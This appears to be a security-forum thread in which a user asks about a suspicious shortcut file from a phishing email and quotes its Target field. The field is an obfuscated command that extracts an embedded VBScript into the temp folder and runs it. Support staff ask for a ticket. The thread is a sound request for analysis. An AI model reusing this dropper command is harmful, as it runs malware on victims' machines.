Recently got an email from Chirotouch with a link to their website, that redirects to a different website and downloads a zip file. In the zip is a .ink file with the following info in the "Target" field. Any ideas on what this does? Webroot didn't pick it up, and Virus total says it's clean.
%comspec% /c copy YPdhS & (fi^ndst^r "psHPn.*" Print.PDF.lnk > "%tmp%\bUQCg.vbs" & "%tmp%\bUQCg.vbs") & cDulb
Page 1 / 1
Would you mind submitting this to our support team in the form of a ticket? That would give us the chance to investigate further. If you are willing to do so, you can create a ticket here.
Login to the community
No account yet? Create an account
Enter your E-mail address. We'll send you an e-mail with instructions to reset your password.